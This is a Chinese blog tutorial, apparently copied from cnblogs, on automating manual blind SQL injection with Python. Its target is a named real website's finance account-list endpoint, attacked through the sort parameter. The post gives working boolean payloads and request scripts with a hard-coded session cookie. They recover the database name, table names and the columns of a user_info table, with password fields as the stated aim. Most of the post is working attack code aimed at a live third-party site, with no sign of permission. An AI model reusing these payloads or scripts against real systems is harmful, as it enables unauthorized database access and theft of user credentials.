zoukankan      html  css  js  c++  java

  • python辅助sql手工注入猜解数据库案例分析

    发现存在sql注入漏洞

    简单一点可以直接用sqlmap工具暴库

    但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库

    首先hachbar开启

    获取cms登录后的sessionid值

    开始构造sql payload

    获取数据库名的长度:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    手工猜解需要从1往后遍历,当为8时,猜解成功

    做sql手工注入的,主要是这个猜解的过程比较麻烦,大量的重复工作,所以需要做成python自动化

    实现脚本如下:

    # -*- encoding:utf-8 -*-
#user()
#database()
import requests
cookies={
        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}

string = ''
for i in range(1,300):
    url='http://yucms.hhlyty.cn/finance/account/accountList'
    body = {'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库名长度
    #body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库中表的个数
    #body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数
    rs = requests.request("POST", url, cookies=cookies, params=body)
    content=rs.content
    length = len(content)
    #print length

    if length == 9459:
        print ("数据库长度为:%d" %i)
        print(rs.text)
        #string += j
#        break
#        print string
#print(rs.text)

    猜解数据库完整的名字

    payload

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

    substr(database(),1,1 ,第一个1,表示字符串的第几位,第二个1,表示截取一位,这样,就可以逐字符猜解

    # -*- encoding:utf-8 -*-
import requests
cookies={
        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}

#dic1='3_abcdefghijklmnopqrstuvwxyz'
dic="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}|[{?>=<;:/.-,+*)('&%$#@!"

print len(dic)

string = ''
for i in range(1,92):
    # leng = len(string)
    # if leng == 8:
    for j in dic:
        #leng = len(string)
        #if leng == 8:
        #m=str(ord(j))
        #print (m)
        m=j
        url='http://yucms.hhlyty.cn/finance/account/accountList'
        body = {'page': '1','rows': '15','order': 'desc','sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format((i),ord(m))}
        rs = requests.request("POST", url, cookies=cookies, params=body)
        content=rs.content
        length = len(content)
        #print (j)
        print (body)
        #print length
        if length == 9459:
            print ("数据库第%d个字符是:%s:" % (i, j))
            m = str(ord(j))
            string += j
            i=i+1
            print (m)
            print (i)
            # n=','
            # m += n
            # print (m)
            break
    print ("数据库是:%s" % string)

    #break

    print (i)
#    print ("数据库第%d个字符是:%s:" % (i,j))
#    print ("数据库是:%s" % string)

    # if length == 9459:
    #     print ("数据库长度为:%d" %i)
    #     print(rs.text)
        #string += j
#        break
#        print string

#print(rs.text)

    猜解表名:

    1.猜解第204张表名的长度:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)
    )&order=desc

    # -*- encoding:utf-8 -*-
#user()
#database()
import requests
cookies={
        'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}

string = ''
for i in range(1,300):
    url='http://yucms.hhlyty.cn/finance/account/accountList'
    #body = {'page': '1','rows': '15','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库名长度
    #body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  #获取数据库中表的个数
    #body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数
    # body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中表的个数
    body = {'page': '1', 'rows': '15', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}  # 获取数据库中第204张表名的长度
    rs = requests.request("POST", url, cookies=cookies, params=body)
    content=rs.content
    length = len(content)
    #print length

    if length == 9459:
        print ("数据库长度为:%d" %i)
        print(rs.text)
        #string += j
#        break
#        print string
#print(rs.text)

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    1表示表名的第一个字符

    204表示数据库中的第204张表

    117表示第一个字符的ascii编码

     

    猜解列名:

    1.首先猜测表中字段的个数

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=36) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    2.逐个字段猜解:

    猜解密码字段:

    猜解第204张表user_info表第一个字段的长度:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=7) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    猜解第一个列名的长度:

    猜解字段名字:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    猜解字段名的第一个字符为85
  • 相关阅读:
    SOG Tactical Tomahawk F01T 飞虎
    90 压缩干粮 飞虎
    美国陆军国民警卫队不锈钢水瓶 ACU色 飞虎
    CentOS安装RabbitMQ
    如何将EXCEL表中的数据导入数据库中
    Silverlight中的WattingDialog
    WPF ProgressDialog
    DataGrid小扩展
    WPF报表控件
    Misc另外一个世界
  • 原文地址:https://www.cnblogs.com/qmfsun/p/7606108.html
Copyright © 2011-2022 走看看